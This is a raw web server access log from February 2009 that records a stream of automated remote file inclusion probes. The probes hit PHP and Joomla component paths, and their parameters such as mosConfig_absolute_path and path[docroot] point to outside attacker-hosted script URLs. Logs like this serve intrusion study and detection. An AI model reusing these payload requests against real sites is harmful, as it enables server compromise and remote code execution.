132.248.117.152 - - [05/Feb/2009:02:45:33 -0600] "GET /cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:02:45:33 -0600] "GET /logs/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
80.67.19.103 - - [05/Feb/2009:02:45:35 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.808"
218.38.12.26 - - [05/Feb/2009:02:45:40 -0600] "GET /logs/access_log.1225756800//galeria.php?start=0&kategoria=http://gumansin.com/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.38.12.26 - - [05/Feb/2009:02:45:40 -0600] "GET //galeria.php?start=0&kategoria=http://gumansin.com/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
218.38.12.26 - - [05/Feb/2009:02:45:40 -0600] "GET /logs//galeria.php?start=0&kategoria=http://gumansin.com/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
218.38.12.26 - - [05/Feb/2009:02:45:45 -0600] "GET /logs//galeria.php?start=0&kategoria=http://gumansin.com/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
218.38.12.26 - - [05/Feb/2009:02:45:45 -0600] "GET //galeria.php?start=0&kategoria=http://gumansin.com/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
218.38.12.26 - - [05/Feb/2009:02:45:45 -0600] "GET /logs/access_log.1225756800//galeria.php?start=0&kategoria=http://gumansin.com/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
195.5.163.212 - - [05/Feb/2009:02:46:15 -0600] "GET /logs/access_log.1214956800//frame.php?framefile=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
81.122.81.86 - - [05/Feb/2009:02:47:56 -0600] "GET /errors.php?error=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.172.33.230 - - [05/Feb/2009:02:49:42 -0600] "GET /logs///vwar/backup/errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:02:49:42 -0600] "GET /logs/access_log.1218758400///vwar/backup/errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:02:49:42 -0600] "GET ///vwar/backup/errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:02:49:46 -0600] "GET /logs/access_log.1213660800///vwar/backup/errors.php?error=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
216.22.26.95 - - [05/Feb/2009:02:49:55 -0600] "GET /index.php?go=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:02:49:55 -0600] "GET /logs/index.php?go=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:02:49:55 -0600] "GET /logs/access_log.1218758400/index.php?go=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:02:49:57 -0600] "GET /logs/access_log.1218758400/index.php?go=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:02:49:57 -0600] "GET /index.php?go=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:02:49:57 -0600] "GET /logs/index.php?go=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
132.248.117.152 - - [05/Feb/2009:02:51:52 -0600] "GET /logs/access_log.1210550400/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:02:51:52 -0600] "GET /cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:02:51:53 -0600] "GET /logs/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
195.5.163.212 - - [05/Feb/2009:02:52:12 -0600] "GET /logs/access_log.1212451200//frame.php?framefile=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:02:54:29 -0600] "GET /logs/access_log.1214438400/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:02:54:29 -0600] "GET /cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:02:54:29 -0600] "GET /logs/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
119.63.201.142 - - [05/Feb/2009:02:55:25 -0600] "GET /logs/access_log.1218758400//oneadmin/photogallery/include.php?path[docroot]=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
80.67.19.103 - - [05/Feb/2009:02:55:30 -0600] "GET /logs/access_log.1218758400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 369 "-""libwww-perl/5.808"
80.67.19.103 - - [05/Feb/2009:02:55:30 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.808"
80.67.19.103 - - [05/Feb/2009:02:55:30 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
80.67.19.103 - - [05/Feb/2009:02:55:42 -0600] "GET /logs/access_log.1219536000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 369 "-""libwww-perl/5.808"
132.248.117.152 - - [05/Feb/2009:02:55:44 -0600] "GET /logs/access_log.1209686400/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
195.5.163.212 - - [05/Feb/2009:02:55:58 -0600] "GET /logs/access_log.1213488000//frame.php?framefile=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.172.33.230 - - [05/Feb/2009:02:56:20 -0600] "GET /logs/access_log.1219536000//admin/doeditconfig.php?thispath=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 334 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:02:56:20 -0600] "GET /logs//admin/doeditconfig.php?thispath=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:02:56:20 -0600] "GET //admin/doeditconfig.php?thispath=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
77.232.66.107 - - [05/Feb/2009:02:57:07 -0600] "GET /?sourcedir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 200 1243 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.232.66.107 - - [05/Feb/2009:02:57:08 -0600] "GET /logs/access_log.1218758400/?sourcedir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.232.66.107 - - [05/Feb/2009:02:57:09 -0600] "GET /logs/?sourcedir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 200 117460 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
93.190.137.242 - - [05/Feb/2009:02:57:59 -0600] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
93.190.137.242 - - [05/Feb/2009:02:57:59 -0600] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
93.190.137.242 - - [05/Feb/2009:02:57:59 -0600] "GET /logs/access_log.1214524800%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
77.232.66.107 - - [05/Feb/2009:02:58:00 -0600] "GET /logs/access_log.1218758400/?sourcedir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.232.66.107 - - [05/Feb/2009:02:58:00 -0600] "GET /?sourcedir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 200 1243 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.232.66.107 - - [05/Feb/2009:02:58:01 -0600] "GET /logs/?sourcedir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 200 117460 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
93.190.137.242 - - [05/Feb/2009:02:58:03 -0600] "GET /logs/access_log.1212278400%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
77.232.66.107 - - [05/Feb/2009:02:59:55 -0600] "GET /logs/access_log.1219017600/?sourcedir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.232.66.107 - - [05/Feb/2009:02:59:55 -0600] "GET /logs/access_log.1217203200/?sourcedir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.232.66.107 - - [05/Feb/2009:03:00:55 -0600] "GET /logs/access_log.1219017600/?sourcedir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.232.66.107 - - [05/Feb/2009:03:00:55 -0600] "GET /logs/access_log.1217203200/?sourcedir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
202.44.52.78 - - [05/Feb/2009:03:01:28 -0600] "GET //admin/doeditconfig.php?thispath=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:03:01:28 -0600] "GET /logs//admin/doeditconfig.php?thispath=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:03:01:28 -0600] "GET /logs/access_log.1219536000//admin/doeditconfig.php?thispath=http://mailform.lwcs.org//coppermine/albums/readme.txt??%0D?? HTTP/1.1" 404 334 "-""libwww-perl/5.65"
132.248.117.152 - - [05/Feb/2009:03:02:11 -0600] "GET /logs/access_log.1209600000/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:02:11 -0600] "GET /cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:02:11 -0600] "GET /logs/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
200.226.133.29 - - [05/Feb/2009:03:02:54 -0600] "GET //?path%5Bdocroot%5D=http://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
77.232.66.107 - - [05/Feb/2009:03:04:10 -0600] "GET /logs/access_log.1216944000/?sourcedir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.232.66.107 - - [05/Feb/2009:03:04:14 -0600] "GET /logs/access_log.1216944000/?sourcedir=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfeelcomz.txt????? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
200.226.133.29 - - [05/Feb/2009:03:04:28 -0600] "GET /logs/access_log.1212364800//?path%5Bdocroot%5D=http://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
200.226.133.29 - - [05/Feb/2009:03:04:29 -0600] "GET //?path%5Bdocroot%5D=http://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
200.226.133.29 - - [05/Feb/2009:03:04:31 -0600] "GET /logs//?path%5Bdocroot%5D=http://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 200 117465 "-""libwww-perl/5.803"
200.226.133.29 - - [05/Feb/2009:03:05:21 -0600] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
93.190.137.242 - - [05/Feb/2009:03:05:44 -0600] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
93.190.137.242 - - [05/Feb/2009:03:05:44 -0600] "GET /logs/access_log.1206230400%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
93.190.137.242 - - [05/Feb/2009:03:05:44 -0600] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
93.190.137.242 - - [05/Feb/2009:03:06:04 -0600] "GET /logs/access_log.1209686400%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.225.245.33 - - [05/Feb/2009:03:06:05 -0600] "GET /logs/access_log.1219017600//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
67.225.245.33 - - [05/Feb/2009:03:06:05 -0600] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
67.225.245.33 - - [05/Feb/2009:03:06:05 -0600] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
67.225.245.33 - - [05/Feb/2009:03:06:14 -0600] "GET /logs/access_log.1215907200//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
204.11.17.16 - - [05/Feb/2009:03:06:39 -0600] "GET /logs/access_log.1215129600//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.cuorerossoblu.com/news/id? HTTP/1.1" 404 361 "-""libwww-perl/5.79"
204.11.17.16 - - [05/Feb/2009:03:06:39 -0600] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.cuorerossoblu.com/news/id? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
204.11.17.16 - - [05/Feb/2009:03:06:39 -0600] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.cuorerossoblu.com/news/id? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
204.11.17.16 - - [05/Feb/2009:03:07:56 -0600] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.cuorerossoblu.com/news/id? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
204.11.17.16 - - [05/Feb/2009:03:07:56 -0600] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.cuorerossoblu.com/news/id? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
132.248.117.152 - - [05/Feb/2009:03:08:11 -0600] "GET /logs/access_log.1215129600/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:08:11 -0600] "GET /cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:08:11 -0600] "GET /logs/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
204.11.17.16 - - [05/Feb/2009:03:08:38 -0600] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.cuorerossoblu.com/news/id? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
64.18.194.51 - - [05/Feb/2009:03:09:12 -0600] "GET /logs/cache/errors.php?error=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
64.18.194.51 - - [05/Feb/2009:03:09:12 -0600] "GET /cache/errors.php?error=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
200.226.133.29 - - [05/Feb/2009:03:10:03 -0600] "GET /logs/access_log.1219017600//?path%5Bdocroot%5D=http://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
204.11.17.16 - - [05/Feb/2009:03:10:50 -0600] "GET /logs//BibTex.php?mosConfig_absolute_path=http://www.cuorerossoblu.com/news/id? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
204.11.17.16 - - [05/Feb/2009:03:10:50 -0600] "GET //BibTex.php?mosConfig_absolute_path=http://www.cuorerossoblu.com/news/id? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
38.99.44.104 - - [05/Feb/2009:03:11:19 -0600] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
93.190.137.242 - - [05/Feb/2009:03:11:47 -0600] "GET /logs/access_log.1212278400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
93.190.137.242 - - [05/Feb/2009:03:11:47 -0600] "GET /logs/access_log.1214524800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
61.63.18.78 - - [05/Feb/2009:03:12:54 -0600] "GET /logs/access_log.1219017600//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yazd.agri-jahad.ir/news-img/chart.gif??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
61.63.18.78 - - [05/Feb/2009:03:12:54 -0600] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yazd.agri-jahad.ir/news-img/chart.gif??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
61.63.18.78 - - [05/Feb/2009:03:12:55 -0600] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yazd.agri-jahad.ir/news-img/chart.gif??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
61.63.18.78 - - [05/Feb/2009:03:12:58 -0600] "GET /logs/access_log.1215907200//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yazd.agri-jahad.ir/news-img/chart.gif??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
216.22.26.95 - - [05/Feb/2009:03:13:10 -0600] "GET //config/dbutil.bck.php?confdir=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:03:13:10 -0600] "GET /logs//config/dbutil.bck.php?confdir=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.810"
216.22.26.95 - - [05/Feb/2009:03:13:15 -0600] "GET /logs/access_log.1217203200%20//config/dbutil.bck.php?confdir=http://h1.ripway.com/matamune/chid.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.810"
89.108.82.20 - - [05/Feb/2009:03:13:27 -0600] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
64.18.194.51 - - [05/Feb/2009:03:13:52 -0600] "GET /logs/cache/errors.php?error=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
64.18.194.51 - - [05/Feb/2009:03:13:52 -0600] "GET /cache/errors.php?error=http://www.bankingvn.com.vn/hcm/modules/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
204.11.17.16 - - [05/Feb/2009:03:14:17 -0600] "GET /logs/access_log.1210636800//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.cuorerossoblu.com/news/id? HTTP/1.1" 404 361 "-""libwww-perl/5.79"
132.248.117.152 - - [05/Feb/2009:03:16:00 -0600] "GET /logs/access_log.1218412800/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:16:00 -0600] "GET /cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:03:16:00 -0600] "GET /logs/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
91.121.24.179 - - [05/Feb/2009:03:16:33 -0600] "GET /logs/access_log.1219017600//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://imelayu.uni.cc//gif/oye.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
91.121.24.179 - - [05/Feb/2009:03:16:33 -0600] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://imelayu.uni.cc//gif/oye.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
91.121.24.179 - - [05/Feb/2009:03:16:33 -0600] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://imelayu.uni.cc//gif/oye.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
174.133.209.66 - - [05/Feb/2009:03:16:39 -0600] "GET /logs/access_log.1219017600//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
174.133.209.66 - - [05/Feb/2009:03:16:40 -0600] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
174.133.209.66 - - [05/Feb/2009:03:16:40 -0600] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/logo.gif?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
222.236.47.182 - - [05/Feb/2009:03:17:04 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://clear.fileave.com/header.jpg? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
67.76.163.60 - - [05/Feb/2009:03:17:08 -0600] "GET /logs/access_log.1219017600//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
67.76.163.60 - - [05/Feb/2009:03:17:08 -0600] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
67.76.163.60 - - [05/Feb/2009:03:17:14 -0600] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
67.76.163.60 - - [05/Feb/2009:03:17:28 -0600] "GET /logs/access_log.1215907200//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.charlottesportbikes.com//modules/Forums/admin/gif/oid.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
